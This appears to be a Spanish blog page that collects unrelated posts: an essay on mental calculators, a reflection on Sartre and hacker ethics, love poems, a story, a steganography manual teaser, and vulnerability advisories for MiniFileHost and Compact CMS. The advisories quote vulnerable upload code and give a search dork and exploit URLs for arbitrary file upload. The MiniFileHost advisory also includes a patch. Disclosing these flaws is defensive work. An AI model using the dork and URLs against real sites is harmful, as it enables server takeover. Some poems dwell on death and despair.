La capacidad para el cálculo mental de Gauss, von Neumann y otros leones matemáticos como Leonhard Euler y John Wallis puede parecer milagrosa; palidece, sin embargo, ante las hazañas de los calculistas profesionales, una curiosa raza de acróbatas mentales que floreció a lo largo del siglo XIX en Inglaterra, Europa y América. Muchos comenzaron su carrera de niños. Aunque algunos escribieron acerca de sus métodos y fueron examinados por psicólogos, probablemente ocultaron la mayoría de sus secretos, o quizás ni ellos mismos entendían del todo como hacían lo que hacían. Zerah Colburn, nacido en Cabot, Vt., en 1804, fue el primero de los calculistas profesionales. Tenía seis dedos en cada mano y en cada pie, al igual que su padre, su bisabuela y al menos uno de sus hermanos. (Se le amputaron los dedos de sobra cuando tenía alrededor de 10 años. Nos preguntamos si acaso fue eso lo que le alentó en sus primeros esfuerzos por contar y calcular.) El niño aprendió la tabla de multiplicar hasta el 100 antes de que pudiese leer o escribir. Su padre, un pobre granjero, se dio cuenta rápidamente de sus posibilidades comerciales, y cuando el rapaz tenía solamente seis años le llevó de gira por primera vez. Sus actuaciones en Inglaterra, cuando tenía ocho años, están bien documentadas. Podía multiplicar cualesquiera números de cuatro dígitos casi instantáneamente, pero dudaba un momento ante los de cinco. Cuando se le pedía multiplicar 21.734 por 543. decía inmediatamente 11.801.562. Al preguntarle cómo lo había hecho, explicó que 543 es igual a 181 veces 3. Y como era más fácil multiplicar por 181 que por 543, había multiplicado primero 21.734 por 3 y luego el resultado por 181. Washington Irving y otros admiradores del niño recaudaron dinero suficiente para enviarlo a la escuela, primero en París y luego en Londres. No se sabe si sus poderes de cálculo decrecieron con la edad o si perdió el interés por actuar. Lo cierto es que volvió a América cuando tenía 20 años, ejerciendo luego otros diez como misionero metodista. En 1833 publicó en Springfield, Mass., su pintoresca autobiografía titulada A Memoir of Zerah Colburn: written by himself. . . with his peculiar methods of calculation. En el momento de su muerte, a los 35 años, enseñaba lenguas extranjeras en la Universidad de Norwich en Northfield, Vt.

Paralelamente a la carrera profesional de Colburn se desarrolla en Inglaterra la de George Parker Bidder, nacido en 1806 en Devonshire. Se dice que adquirió la destreza en el cálculo aritmético jugando con piedrecitas y botones, porque su padre, un picapedrero, sólo le enseñó a contar. Tenía nueve años cuando se fue de gira con su progenitor. Entre las preguntas que le planteaban los espectadores puede elegirse la que sigue: si la Luna dista 123.256 millas de la Tierra y el sonido viaja a cuatro millas por minuto ¿cuánto tiempo tarda éste en hacer el viaje de la Tierra a la Luna (suponiendo que pudiese)? En menos de un minuto el niño respondía: 21 días, 9 horas y 34 minutos. Cuando se le preguntó (a los 10 años) por la raíz cuadrada de 119.550.669.121, contestó 345.761 en 30 segundos. En 1818, cuando Bidder tenía 12 años y Colburn 14, coincidieron en Derbyshire, donde hubo un cotejo. Colburn da a entender en sus memorias que ganó el concurso, pero los periódicos de Londres concedieron la palma a su oponente. Los profesores de la Universidad de Edimburgo persuadieron al viejo Bidder para que les confiase la educación de su hijo. El joven se desenvolvió bien en la universidad y finalmente llegó a ser uno de los mejores ingenieros de Inglaterra. Los poderes de cálculo de Bidder no decrecieron con la edad. Poco antes de su muerte, acaecida en 1878, alguien citó delante de él que hay 36.918 ondas de luz roja por pulgada. Suponiendo que la velocidad de la luz es de 190.000 millas por segundo, ¿cuántas ondas de luz roja, se preguntaba, llegarán al ojo en un segundo? «No hace falta que lo calcules», dijo Bidder. «El número de vibraciones es 444.433 .651.200.000».

Tal vez haya sido Alexander Craig Aitken el mejor de los calculistas mentales recientes. Profesor de matemáticas de la Universidad de Edimburgo, nació en Nueva Zelanda en 1895 y fue coautor de un libro de texto clásico, The Theory of Canonical Matrices, en 1932. A diferencia de otros calculistas ultrarrápidos, no comenzó a calcular mentalmente hasta la edad de 13 años, siendo el álgebra, no la aritmética, lo que despertó su interés. En 1954, casi 100 años después de la histórica conferencia de Bidder, Aitken pronunció otra en la Sociedad de Ingenieros de Londres sobre el tema «El arte de calcular mentalmente: con demostraciones». El texto fue publicado en las Transactions de la Sociedad (Diciembre, 1954), con el fin de conservar otro testimonio de primera mano de lo que ocurre dentro de la mente de un calculista mental rápido. Un prerrequisito esencial es la capacidad innata para memorizar números rápidamente. Todos los calculistas profesionales hacen demostraciones de memoria. Cuando Bidder tenía 10 años, pidió a alguien que le escribiera un número de cuarenta dígitos y que se lo leyera. Lo repitió de memoria inmediatamente. Al final de una representación, muchos calculistas eran capaces de repetir exactamente todos los números con los que habían operado. Hay trucos mnemotécnicos mediante los que los números pueden transformarse en palabras, que a su vez pueden memorizarse por otro método, pero tales técnicas son demasiado lentas para emplearlas en un escenario y no hay duda de que ningún maestro las empleaba. «Nunca he utilizado reglas mnemotécnicas», dijo Aitken, «y recelo profundamente de ellas. No hacen más que perturbar con asociaciones ajenas e irrelevantes una facultad que debe ser pura y límpida». Aitken mencionó en su conferencia haber leído recientemente que el calculista francés contemporáneo Maurice Dagbert había sido culpable de una aterradora pérdida de tiempo y energía» por haber memorizado pi (v.) hasta el decimal 707 (el cálculo había sido hecho por William Shanks en 1873). «Me divierte pensar», dijo Aitken, «que yo lo había hecho algunos años antes que Dagbert y sin encontrar ninguna dificultad. Sólo necesité colocar los digitos en filas de cincuenta, dividir cada una de ellos en grupos de cinco y luego leerlas a un ritmo particular. De no ser tan fácil habría sido una hazaña reprensiblemente inútil». Veinte años después, cuando los computadores modernos calcularon pi con miles de cifras decimales, Aitken se enteró de que el pobre Shanks se había equivocado en los 180 últimos dígitos. «De nuevo me entretuve», continuó Aitken «en aprender el valor correcto hasta el decimal 1000, y tampoco entonces tuve dificultad alguna, excepto que necesitaba 'reparar' la unión donde había ocurrido el error de Shanks. El secreto, a mi entender, es relajarse, la completa antítesis de la concentración tal como normalmente se entiende. El interés es necesario. Una secuencia de números aleatorios, sin significación aritmética o matemática, me repelería. Si fuera necesario memorizarlos, se podría hacer, pero a contrapelo». Aitken interrumpió su conferencia en este punto y recitó pi hasta el dígito 250, de un modo claramente rítmico. Alguien le pidió comenzar en el decimal 301. Cuando había citado cincuenta dígitos se le rogó que saltase al lugar 551 y dar 150 más. Lo hizo sin error, comprobándose los números en una tabla de pi

Mas Informacion...

WC 2009 Dusseldorf Final 3x3x3

Sartre y el Underground

Autor : LU73K

En mis ratos de filósofo suelo meditar sobre el mundo que me rodea y como repercuten las actitudes de las personas en el mundo.
Como dice el título voy a invitarlos a una reflexión sobre la ideología de Sartre y su vinculación que encuentro en el underground.
También planeo incluir un poco de ética y mi punto de vista sobre como deberíamos actuar dentro del underground (Con Undeground meto todo lo vinculado a hacking, informática y demás en una misma bolsa).

Para comenzar voy a mencionar los aspectos mas importantes de Sartre en su ideología.
“La existencia precede a la esencia” es la tesis del existencialismo. Voy a mencionar un ejemplo utilizado por el mismo Sartre para explicar su tesis.
Supongamos que un artesano decide elaborar un corta papel, en dicho caso primero se genera un concepto de que es un corta papel y de sus características que lo definen junto con su función. De aquí surge la esencia del cortapapeles y luego el artesano dará lugar a la existencia del cortapapeles cuando lo elabore.
Dicho esto podríamos señalar que el cortapapeles se pensó antes de ser elaborado y que el artesano es quien determinó la esencia del cortapapeles y por ende su existencia luego.
Sartre señala que al no existir un dios (recordemos su condición de ateo) no existe un artesano que genere un concepto previo de las cosas. Por tanto si el hombre no fue pensado previamente al existir, no pudo tener entonces una esencia definida antes de existir, la existencia precede a la esencia.
El hombre no es otra cosa que lo que el mismo se hace, este es el primer principio del existencialismo.
En definitiva el hombre mismo es quien define su esencia y por tanto el mundo es lo que los hombres hacen que sea.
Al nacer una persona es completamente libre y totalmente responsable señala Sartre. Al ser el hombre un proyecto en construcción somos libres pero también totalmente responsables ya que cuando uno actúa es un modelo de humanidad a seguir para el resto.
Si al ser libres actuamos como queremos es porque creemos que nuestra forma de actuar es la mas adecuada y esto genera que nuestros actos se presenten como modelo a seguir de otros.
Dada esta situación de estar condenados a ser libres hay quienes buscan eludir sus responsabilidades delegándolas a otros, por ejemplo una persona que justifica su matanza a personas por el hecho de que una voz divina le ordenó actuar de esa forma. Para estas personas Sartre señala que actúan en mala fe por el hecho de buscar excusas para quitarse responsabilidad.
Espero que hallan logrado seguir la lectura y comprendido todo, igualmente toda esta información pueden leerla mas detalladamente en el libro de Sartre “El existencialismo es un humanismo”
Ahora, que tiene que ver todo esto con el Underground?, bueno creo que alguno ya viene rumbeado con la repuesta pero voy a presentar mi postura y asociación para aquellos que todavía mantienen su duda.
Ya muchos hablaron sobre la ética de un hacker y sobre lo bueno que son los hackers y lo malos que son los crackers, en esta oportunidad a mi no me interesa hablar de hackers porque a los verdaderos h4x0rs es dificil encontrarlos en la red. Esta reflexión se enfoca tanto a los que empiezan a dar pasos en el mundo de la seguridad informática o de la programación y también para los que ya llevan unos cuantos años metidos en el tema.
Porque actuamos como actuamos? Porque decidimos por cosas de las que somos conscientes que están mal vistas o es culpa de la sociedad mediocre?. Están son algunas de las preguntas que pretenden una respuesta fácil a los actos ilegales.
Muchas veces escuche el “defaceo porque los demás son imbéciles y no tienen el mínimo de seguridad”, “soy carder porque aprovecho la estupidez de los otros y ademas no jodo a nadie porque las compañías de tarjetas pagan seguros”
Probablemente muchos de los que lean esto inclusive tú se sientan ajenos a estas preguntas y respuestas pero déjenme aclarar que de los que están en el under ninguno es ajeno a la situación y los invito a leer las próximas lineas.
A diferencia de los que actúan en “mala fe” según Sartre delegando sus responsabilidades dentro del underground no tenemos este tipo de casos. Al menos yo nunca me encontré con uno que me dijera “hackie una pagina porque el ángel Gabriel me dijo en mis sueños que el dueño de dicha pagina era un pederasta”
Dentro del Underground todos son conscientes de la ilegalidad en sus actividades y aún así ese no es un motivo por el cual una persona deje de defacear libros de visitas, hacer inyecciones SQL, o cardear, etc. Todos generalmente asumen sus responsabilidades en los actos, por algo existe un “Zone-h” donde se reportan defaces y se indica el nombre del atacante.
Siguiendo con la línea de Sartre ningún usuario de Internet es creado previamente (y no me refiero a “useradd”), cada usuario va definiendo su identidad según sus actos y obviamente estos representan un modelo a seguir y lo construyen como usuario. En Internet todos estamos condenados a ser libres y también somos totalmente responsables de nuestros actos (pregúntenselo a Mitnick).

“Eligiéndome elijo al hombre” dijo Sartre, en cierta forma volviendo con lo anterior al definirnos como usuarios en Internet y siendo libres nos definimos como queremos ser y por tanto estamos definiendo como queremos que sean los demás usuarios de la red.
Creo que uno de los puntos mas importantes es este y a partir de esto es que el poder de como queremos que sea el undeground del mañana esta en nuestros actos.
Voy a mencionar algunos ejemplos para clarificar la situación:
Jorge carder al cardear algo da un modelo a los demás y si todos seriamos carders francamente a mis padres les llegaría una deuda demasiado gruesa y se joderían muchas personas. Por eso invito a todos aquellos Jorges a que reflexiones que modelo le están dando a los demás a seguir y que asuman la responsabilidad como debe ser, es este el underground que yo quiero vivir mañana?
Otro ejemplo podría ser el de Cacho el defacer, Cacho se dedica únicamente a defacear gov`s protestando contra los gobiernos y haciéndole leer al mundo que odia las papas fritas.
Vos que podrías ser un Cacho2 te gustaría vivir el el underground de mañana viendo a todos compitiendo por quien protesta mas contra la prohibición de vender papas fritas. Cuando se acaben los gov`s para ownear y queden miles y miles de usuarios sin poder explotar inyecciones SQL, XSS, exploits que van a hacer? A que se van a dedicar si gastaron años de su vida usando tools de un tercero y sin saber que es bien “Information.Schema”. Nosotros dando la imagen que estamos dando queremos que el underground del mañana sea un undegraund lleno de usuarios sin conocimiento para trabajar realmente como consultores IT.
Vas a perder un año mas de tu vida explotando vulnerabilidades o vas a seguir a Sartre y vas a reflexionar lo siguiente:
Al ser totalmente responsable de mis actos y presentar un modelo a seguir a los demás quiero ser el mayor de los modelos a seguir, quiero entender la red en la que me muevo quiero intercambiar información que me permita avanzar. A partir de hoy voy a retomar mis estudios en administración de sistemas (es un ejemplo nomas) para poder conseguir trabajo en algún banco (o lo que sea) y prevenir a los usuarios de robos millonarios. Yo quiero avanzar y no quedarme en la mediocridad de ser el “protestón” quiero ser el que avance y llegar lejos para que mi voz se escuche fuerte y clara...
La decisión de continuar es tuya, vos podes cambiar tus actos para construir mejores usuarios y está en vos que el mañana sea de construcción y no de destrucción
Humildemente LU73K.

Rubik's cube bloopers, by the world record holder

Uno de los mejores trucos del mundo

Futbol americano - trucos

El poder oculto de la mujer

Quizas a mas de uno, despues de leer esta teoria, piense que soy un feminista o algo asi, la verdad es que no lo soy, soy realista, y bueno, digo lo que veo, me fijo en ello, lo miro, lo observo, lo analizo, y saco una teoria, y esta teoria, la verdad es que trata de la mujer, si, ese ser tan perfecto, desde siempre, hemos subestimado a la mujer, hace mucho tiempo el mundo era machista, desgraciadamente, hoy en dia en algunos paises, sigue siendolo, por que el mundo se rige por la fuerza exterior, y no por la interior, y creo que hay que admitir, que en fuerza interior, las mujeres ganan, casi todos los años, me voy de vacaciones a marruecos, es un pais que desgraciadamente, sigue siendo algo machista, y que subestiman a la mujer, y le dan "poco poder", pero es interesante ver como la mujer tiene tanto poder, sin que el hombre lo sepa, en marruecos e vivido muchas cosas, e visto peleas, intentos de matarse, insultos, etc, y ¿sabeis que es lo primero que se piensa alli cuando dos hombres luchan?, que es por una mujer, si bueno, en muchos casos es asi, cuando es por una mujer, mayormente se suele decir que es por que a hecho brujeria, e de admitir que en muchos casos si se a usado la brujeria, pero en otros, solo la brujeria del amor, y es interesante como puede una mujer, controlar a un hombre con el amor, y creo que todo aquel que haya estado enamorado, estara de acuerdo, pensamos que las mujeres no controlan, pensamos que las mujeres no tienen poder, pero, ¿saben que poder tienen las mujeres?, el mismo que tenemos nosotros, ya que pueden controlarnos, no digo que a todos, seria algo injusto y muy cabron por mi parte, decir que las mujeres nos controlan al 100%, eso es imposible, al igual que decir que todas las mujeres lo hacen o lo pueden hacer, solo aquellas que, en el fondo, o en lo superficial, sintamos algo, y para ello pondre un ejemplo, nuestra pareja, cuando nos dice que le gusta algo, cuando dice que quiere ir a algun sitio, como, como tontos, vamos a intentar cumplir aquello que quiere, no digo que eso sea controlarnos, sino que simplemente nos demos cuenta, de lo que podemos hacer, para que ellas sean felices, y se quiera o no, es un control sobre nosotros, tambien los hombres tenemos control sobre las mujeres, unos controlan a otros, y otros a unos, pero no es tan fuerte, por que... a ver como lo explico, la mujer tiene algo que... que a los hombres, a la mayoria, les hace caer ante ellas, seguro que mas de alguno, por su ego, o por su orgullo, no lo admite, pero cuando se enamore, seguro que lo vera, y vera lo interesante que es eso, unos han conseguido darse cuenta de cuando les controlan, o les quieren controlar, yo por ejemplo, con mis experiencias en la vida, me consigo dar cuenta de cuando me controlan, o quieren controlar, y como es logico, lo evito, menos con ella, con ella... no, todas las mujeres tienen el instinto de madre, y todos sabemos que ese instinto es el mas protector, si una mujer te quiere, y te controla, sera para tu bien, lo que quiero decir con este escrito, es que no debemos subestimar a las mujeres, como tanto han hecho, y algunos siguen haciendo, son muy importantes, los hombres tambien, pero creo que eso no necesito apoyarlo, todos lo apoyan (y no, no me parece bien que solo apoyen eso), los hombres y las mujeres son muy importantes en este mundo, lo que un hombre puede hacer, una mujer tambien, y lo que una mujer puede hacer, un hombre tambien, a uno le costara mas esfuerzo, por que no esta hecho para ello, pero, ¿hay algo que realmente valga en esta vida, y no se consiga con esfuerzo?, hagamos el esfuerzo de ser todos iguales, y de apartar las diferencias a un lado, quizas un hombre pueda construir mejor una casa, pero una mujer la puede mantener mejor, quizas hay una mujer que puede construir una casa, y tambien habra algun hombre, que la pueda mantener mejor...

¿Vas acabar siendo fuerte?

Silencio, muros, abandono

No hay peor silencio
que el de un corazon abandonado
Un corazon que se canso de pedir a gritos
que queria ser amado
Un corazon que camino
en la inmensa oscuridad de su abandono
Un corazon para el que las horas eran segundos
los años eran dias
sin nadie a su lado
sin nadie que le haya apoyado
da su ultimo suspiro
su ultima oportunidad de levantar la mirada
y lo encuentra
ese rayo de luz
es tu corazon
brilla en la oscuridad de su tunel
para guiarle hacia la libertad
deja atras los muros
deja atras las cadenas
deja atras sus miedos
es libre
sin temores
sin preocupaciones
sin llantos ni lagrimas
sin gritos de auxilio
te ha encontrado
le has salvado
tu mirada lo ha atrapado
tu belleza lo a atado
en tus manos su corazon a dejado
ahora tu, eres su amo.

Ocaso

Solo quiero escribir... por última vez...
solo deseo no volver a tocar jamás una pluma
no continuar armando palabras... tragarme todo....
no dejar salira nada.... de nada vale dejar salir algo...
todo tiene un final... cada amanecer trae consigo un ocaso...
hoy es mi ocaso...

Dime si podré intentar olvidarte...
dime si por estar lejos de ti dejaré de pensarte...
si con no verte detendría el deseo de soñarte...
si no ver tus ojos harán que olvide esta historia...
si con no sentir tus brazos hará que me olvide de ellos...
si con no sentir tu piel me forzaré a dejar de sentir...
dime si con tenerte lejos lograré olvidar todo lo que siento....
dime si mataría el deseo de hacer realidad lo que no pudo ser.
Solo dime si refugiarme en otros brazos encontraré un alivio...
si entre la desolación en la que me encuentro aparecerá alguien como tu...
dime como olvidar esa voz dulce que aun suena en mis oídos...
dime como no sentir esta confusión....
solo dime que no es un sueño.... solo dime que me estoy engañando...
que no veo mi piel herida sangrar como sangra mi alma...
dime que no es mi alma que se ha destrozado...
que solo es una reacción que no se sentirá de nuevo....

Quizás suene lógico que lejos le abriré mi corazón a otra mujer
que en mi habitación la soledad se convertirá en compañía con el tiempo
que todo pasa y todo se olvida... y que te convertirás en un amargo recuerdo...
que mi alma se llenará con la brisa de libertad, viviendo en algo que sea real, no solo de sueños...
Quizás suene lógico... pero para mi es tonto...
la distancia solo me hará vivir en un mundo de recuerdos...
prefiero vivir entre recuerdos que me entierren entre un mundo yerto...
a olvidarte con un fantasma que reemplaze tu puesto...
como olvidarte con un fantasma, mi cielo...
como olvidarte, como volverte en algo pasajero...

Solo disculpame si molesto tu desición con estas letras....
cuando al final los muertos no escriben, no piensan...
quizás alguien más te hace feliz, no como este cuerpo...
quizás alguien te hará sonreir, no como este muerto...
quizás... quizás... quizás....

gracias mi angel ...
gracias por esos buenos y esos malos momentos...
gracias por esa compañía... gracias por estar conmigo hasta que tus fuerzas lo permitieron...
ahora solo puedo caminar por las comarcas olvidadas...
llevando en mi espalda un recuerdo por el cual continuar...
solo caminando... sin futuro, solo con recuerdos...
por que siempre seré el mismo...
siempre seré aquel muerto.

Sin razones para vivir

Apago el ultimo cigarro del paquete que empece hace 2 horas.
Me tumbo en la cama.
Contemplo el techo mientras poco a poco mi respiracion se hace mas debil.
Y es que siento que mi corazon late mas lento.
Siento que necesita calor.
Siento que necesita amor.
Siento que te necesita a ti.
Noto como mi pulso se hace mas debil.
Noto como mi respiracion poco a poco se detiene.
Empiezo a recordar.
Tu, tu me cambiaste.
Tu, tu me hiciste como soy.
Tu, tu me hiciste calido.
Recuerdo los momentos en los que mi vida se rodeaba de frialdad.
No sentia tristeza.
Pero tampoco alegria.
No sentia el frio, me acostumbre a el.
Pero necesitaba de la calor.

El sueño se hace cada vez mas profundo.
El latido cada vez mas debil.
La respiracion cada vez mas lenta.

Siento algo en mi cara.
Son tus caricias.
Siento algo en mi espalda.
Son tus abrazos.
Siento algo en mis labios.
Son tus besos.
Siento algo en mi oido.
Son tus Te amo.
¿Donde te fuiste?
¿Por que desapareciste?
¿En que falle?
¿Por que te perdi?
¿Por que no te puedo sentir?
¿Por que sin ti no puedo vivir?

Mi corazon se esta enfriando.
Mi respiracion se esta acortando.
Mi vida delante de mis ojos pasando.
Y en cada fotograma, tu foto estoy recordando.
Los momentos que contigo e pasado.
Que razones para vivir me han dado.
Y es que en mi vida te has quedado.
Y tu nombre en mi corazon grabado.
La llama que iluminaba mi corazon se a apagado.
Por que de tus caricias recuerdos han quedado.
Dime por que de ti solo sueños e recordado.
Y de mi corazon te has alejado.
Siento mi corazon detenerse.
Siento mi respiracion pararse.
Podria gritar para que me ayudasen.
Pero si tu no apareces, para que esforzarse.
En mis sueños no paro de buscarte.
Para en una simple fantasia refugiarme.
En la que jamas te perdi.
Y como me prometiste, siempre tenerte aquí.
Mi corazon se detiene.
Por que sabe que no tiene razones para latir.
La razon por la que vivir.
Hace tiempo la perdi.
Y es que para que mi corazon vuelva a latir.
Necesita que estes aquí.

Fuente

Mi deseo cumplido

Queria compartir esta historia con vosotros , que es muy parecida a la mia , el problema es que el mio aun no se cumple :/

------------------------

- Hola javi, bienvenido - Dijo la psicologa sonriendo - Ven, sientate, me llamaste hace poco y estabas raro, cuentame, ¿que a pasado?


(Entro a la consulta de la psicologa)
- Hola javi, bienvenido - Dijo la psicologa sonriendo - Ven, sientate, me llamaste hace poco y estabas raro, cuentame, ¿que a pasado?

(La mire a los ojos, sonrie, y fui directo al grano)
- Todos los dias quedabamos ibamos a dar una vuelta al paseo o quizas al campo mis amigos y yo teniamos donde ir siempre se estaba muy bien yo era feliz y sigo siendolo pero algo fallaba no se, a pesar de tener amigos, familia que me quiere, etc, me sentia solo, sentia que necesitaba algo, no se, algo no estaba completo, entonces de un dia para otro, volvio a aparecer ella. - Dije mientras miraba mi telefono

- ¿Ella? ¿Quien es ella? - Dijo la psicologa muy intrigada

- La chica con la que me di el primer morreo, la chica con la que tuve mi primer sexo, la chica con la que tuve mi primer amor - Dije mientras sonreia

- Entonces, ¿sera muy especial no? - Dijo la psicologa

- Mas de lo que me creia, mas de lo que me creia... 3 años sintiendo algo por ella, y sin ninguna vez lanzarme, vaya estupido, solo de pensar que podia haber perdido a esa chica especial, me hace repetirme que soy un loco - Dije sin quitar la mirada al telefono

-¿Por que no le dijiste nada?

- Por miedo, miedo al rechazo, a perderla como amiga, a que me olvide, pero ella sentia lo mismo que yo, me lo dijo, y con eso consegui algo mejor

- ¿Que conseguiste?

- Un amor y una mejor amiga

- ¿Y que diferencia hay entre una novia y una novia y mejor amiga?

- A una novia le cuentas muchas cosas, pero no le cuentas todo, por miedo, miedo a como reaccione, a como se ponga, etc, se lo cuentas mas a los amigos, a una novia y mejor amiga, se lo cuentas todo, puedes hablar con ella como novia, o como mejor amiga, y sabe actuar como tal en cada momento, es fantastico, mejor dicho, ella es fantastica

- ¿Que tiene de especial?

- Mejor dicho, que no tiene de especial, lo tiene todo, sus ojos marrones verdosos, su cuerpo, sus piernas, su cintura, su... su... dios... su mirada, esa mirada, jamas me habia quedado tanto tiempo delante del ordenador mirando la misma foto, esos ojos, mi deseo cumplido

- ¿Tu deseo cumplido? ¿Que quieres decir?

- Cuando me sentia solo, todas las noches hacia algo que mi madre me dijo que funcionaba, y si, funcionaba, que es antes de irte a dormir, pedir un deseo, todas las noches pedia el mismo "que me enamorase y tuviese una novia que me amase, no estar solo, tener un amor", jamas pense que iva a ser ella, ¿ella?, ¿la chica con la que pase tantas cosas?, llevo 8 meses con ella, lo e pasado todo con ella, todo lo primero con ella, desde lo bueno, hasta lo malo, mi primer morreo, mi primer sexo, mis primeras locuras, mis primeros cabreos tan fuertes, mi primera vez escribiendo tantas cosas a una persona, mi primera vez diciendole a alguien al oido te amo, mi primera vez corriendo 3 km por ella, mi... mi primera vez entregandole mi corazon a alguien

- ¿Y cual es el problema?

- Que no hay ningun problema, que no se ni como me merezco una chica tan buena, tan especial, como un chico tan simple como yo, tenga a alguien como ella, pero lo agradezco igual, y no la quiero perder, el problema es que no hay... ningun problema... - Dije sonriendo al telefono

- ¿Que miras en el telefono? - Dijo la psicologa intrigada intentando ver el telefono

- Mi luna

- ¿Tu luna?

- Si, mi luna - Y le enseñe su foto, la de Yaiza, la psicologa sonrio

- ¿Y por que es tu luna?

- Por que por mucho que oscurezca todo, por mucho que el sol se vaya, y por mucho que no vea nada y no sepa donde ir, ni que hacer, siempre estara ella iluminandome

Te amo hermosa

Fuente | InfiernoHacker

Esteganografía desde cero.

Aquí les dejo un manual escrito por XiONeX. Como bien dice su titulo se trata de la esteganografía.

Índice.
*Índice de temas.
*Prólogo y agradecimientos.
*Introducción.
*Historia.
*Publicaciones a través del tiempo.
*Métodos antiguos y actuales.
*Bases.
*Interpretación y tipo de ficheros.
*Ficheros de imagen.
*Sistemas básicos.
*Método copiar mediante la consola.
*Método (LSB).
*Ficheros de Audio.
*Método (LSB) en audio.
*Esteganografía actual.
*Esteganografía avanzada.
*Software.
*¿Efectividad?
*Derechos de autor.

Introducción.
“Lo más importante de la vida siempre pasa desapercibido ante la visión humana”.

XiONeX

En conclusión, podemos definir esteganografía como el arte de ocultar un texto, o
como el arte de escribir en una manera oculta. Muchas personas creen que la esteganografía y la criptografía son iguales, pero ¡NO!.

Pueden intercalarse la una a la otra para tener mejores resultados, pero jamás serán
iguales. Criptografía: (Cripto: Oculto) y (Graphos: Escritura), tal vez se vea demasiado
parecido pero no lo es.
La criptografía según el diccionario se define como: Escribir de forma enigmática.
La diferencia radica en el punto de lo “enigmático”. La criptografía se encarga de tomar un mensaje legible (texto plano) y posteriormente cifrarlo (encriptarlo) para que solo la persona que lo envía y el destinatario puedan entenderlo, de esta manera la información pasara por manos de terceros pero no podrá sé legible sin conocer el método con el cual fue cifrado, claro que esto no siempre será posible pues el estudio de la criptografía también se encarga del criptoanálisis y de intentar romper ese tipo de seguridad para poder descifrar cualesquier tipo de mensaje.

Ahora, la esteganografía tiene el mismo propósito: transportar información, solo que
en la esteganografía ni si quiera se sabe que la información existe.
Para entenderlo mejor, asumamos el papel de una tercera persona que quiere “conocer la información” que se trafica entre dos medios, pues si estos medios están usando criptografía nosotros con suerte podremos ver sus mensajes, pero lamentablemente los mismos no tendrán ningún significado ya que fueron cifrados para que fuesen ilegibles.

Ahora, si hablamos de esteganografía nosotros con suerte podremos capturar trafico de información pero al momento de obtenerla podremos leer algo de información pero no sabremos de la existencia de lo que en realidad se están comunicando, solo el escritor y los destinatarios saben como extraer dicha información. Aquí elabore unas imágenes en el xphotoshop, que por cierto son demasiado pésimas.

Así que para la próxima le pido ayuda a un diseñador experimentado (jaja). Las
imágenes son una especie de grafica que representa la información transitando sobre
dos medios y como la ve una tercera persona.

¿QUIERES SABER MÁS?

Descarga el documento y obten completo el manual de 42 paginas.

Descarga

Autor : XiONeX
Web : www.xionexsystems.blogspot.com

MiniFileHost - Bypass Upload

MiniFileHost v1.5
HomePage : http://www.galaxyscripts.com/
Vulnerbilidad : Bypass Upload

Sec-Test : Xonk - xonkcryp [at] gmail [dot] com

Bypass Upload

Descripcion :
- Permite subir al servidor cualquier tipo de archivo modificando los Headers HTTP (modificando el tipo del archivo como el de una image , ej : image/jpeg), con lo que se podria obtener un control total de los archivos del servidor .

<?php

// Archivo : basic.php
// Linea : 25

if (($HTTP_POST_FILES['userfile']['type']=="image/gif") || ($HTTP_POST_FILES['userfile']['type']=="image/pjpeg") || ($HTTP_POST_FILES['userfile']['type']=="image/jpeg") || ($HTTP_POST_FILES['userfile']['type']=="image/bmp") || ($HTTP_POST_FILES['userfile']['type']=="image/png")) {
....
}
?>

Patch :

<?php

// Patch Bypass Upload by Xonk
// Archivo : basic.php
// Modificar a partir de la linea 25 :
// if (($HTTP_POST_FILES['userfile']['type']=="image/gif") ....
// Hasta antes de la linea 39 :
// if (!$res) { echo "<font color="#333333" face="Geneva, Arial, Helvetica, sans-serif"> .... }


if (!isset($HTTP_POST_FILES['userfile'])) exit;

if (is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {

if ($HTTP_POST_FILES['userfile']['size']>$max_size) {
echo "<font color="#333333" face="Geneva, Arial, Helvetica, sans-serif">File Size too Big!</font><br>n"; exit; }
if (($HTTP_POST_FILES['userfile']['type']=="image/gif") || ($HTTP_POST_FILES['userfile']['type']=="image/pjpeg") || ($HTTP_POST_FILES['userfile']['type']=="image/jpeg") || ($HTTP_POST_FILES['userfile']['type']=="image/bmp") || ($HTTP_POST_FILES['userfile']['type']=="image/png")) {

// ------- PATCH ----------
$ext = strtolower(substr($_FILES['userfile']['name'], strrpos($_FILES['userfile']['name'], '.')));
$supportedextentions = array('.jpg','.jpeg','.png','.gif','.bmp');
$upload = true;
if(!in_array($ext, $supportedextentions)) {
$upload = false;
}

if (file_exists("./".$path . $HTTP_POST_FILES['userfile']['name'])) {
echo "<font color="#333333" face="Geneva, Arial, Helvetica, sans-serif">A File with that name exists, please rename your file.</font><br>n"; exit; }

if($upload) {
$zufall = rand(123,999999);
$fupl = "$zufall";
$imgtext = $zufall .$HTTP_POST_FILES['userfile']['name'];
$userip = $_SERVER['REMOTE_ADDR'];
$time = time();

$res = move_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'], "./".$path .$fupl .$HTTP_POST_FILES['userfile']['name']);
}
// ------- END PATCH ----------

if (!$res) { echo "<font color="#333333" face="Geneva, Arial, Helvetica, sans-serif">Upload Failed, please try again</font><br>n"; exit; } else {
$filelist = fopen("./imgfiles/".$imgtext.".txt","w");
fwrite($filelist, "images/" ."|".$imgtext."|". $zufall ."|". $userip ."|". $time."|n");
?>

Compact CMS - Multiples Vulnerabilidades

Compact CMS
HomePage : http://www.compactcms.nl/
Vulnerbilidad : Arbitrary File Upload | Remote File Remove

Sec-Tester : Xonk - xonkcryp [at] gmail [dot] com
Dork : "Maintained with CompactCMS"

Arbitrary File Upload
Descripcion :
-Permite subir al servidor cualquier tipo de archivo , con lo que se podria obtener un control total de los archivos del servidor .

<?php

// Archivo : admin/includes/tiny_mce/plugins/advimage
// Linea : 212

if ($act == 'upload') {
$name = $_FILES['upload']['name'];
if (!is_dir($dirname)) {
  mkdir($dirname,0777);
};
if (file_exists("$dirname/$name"))  {
    echo "<p>"._EXIST." $dirname/$name </p>";
} else {
   if (is_uploaded_file($_FILES['upload']['tmp_name'])) {
      if (move_uploaded_file($_FILES['upload']['tmp_name'],"$dirname/$name" ))
....
?>

http://[path]/admin/includes/tiny_mce/plugins/advimage/gallery.php?dirname=[Directorio-Upload]

Example :
http://[path]/admin/includes/tiny_mce/plugins/advimage/gallery.php?dirname=C:/xampp/htdocs/

Obteniendo el Directorio del Uploader por defecto :
http://[path]/admin/includes/tiny_mce/plugins/advimage/gallery.php?act=upload

Path Disclosure :
